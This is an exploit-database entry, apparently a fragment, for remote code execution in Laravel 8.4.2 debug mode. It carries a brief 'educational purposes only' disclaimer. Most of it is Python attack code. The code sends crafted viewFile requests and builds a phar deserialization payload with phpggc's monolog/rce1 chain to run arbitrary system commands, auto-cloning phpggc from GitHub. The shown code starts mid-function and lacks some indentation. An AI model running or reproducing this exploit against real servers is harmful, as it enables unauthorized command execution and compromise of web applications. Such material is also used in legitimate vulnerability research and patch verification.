Exploits / Vulnerability Discovered : 2021-01-14 |
Type : webapps |
Platform : php
This exploit / vulnerability Laravel 8.4.2 debug mode remote code execution is for educational purposes only and if it is used you will do on your own risk!
data['parameters']['viewFile'] = viewFile
resp = requests.post(url=url, json=data, headers=header, verify=False)
if resp.status_code == 500 and 'cannot be empty' in resp.text:
m = re.findall(r'\{(.|\n)+\}((.|\n)*)', resp.text)
print()
print(m[0][1])
def generate_payload(command='', padding=0):
if '/' in command:
command = command.replace('/', '\/')
command = command.replace('\'', '\\\'')
os.system(r'''php -d'phar.readonly=0' ./phpggc/phpggc monolog/rce1 system '%s' --phar phar -o php://output | base64 -w0 | sed -E 's/./\0=00/g' > payload.txt'''%(command))
payload = ''
with open('payload.txt', 'r') as fp:
payload = fp.read()
payload = payload.replace('==', '=3D=')
for i in range(padding):
payload += '=00'
os.system('rm -rf payload.txt')
return payload
if not os.path.isfile('./phpggc/phpggc'):
print('Phpggc not found!')
print('Run command: git clone https://github.com/ambionics/phpggc.git')
os.system('git clone https://github.com/ambionics/phpggc.git')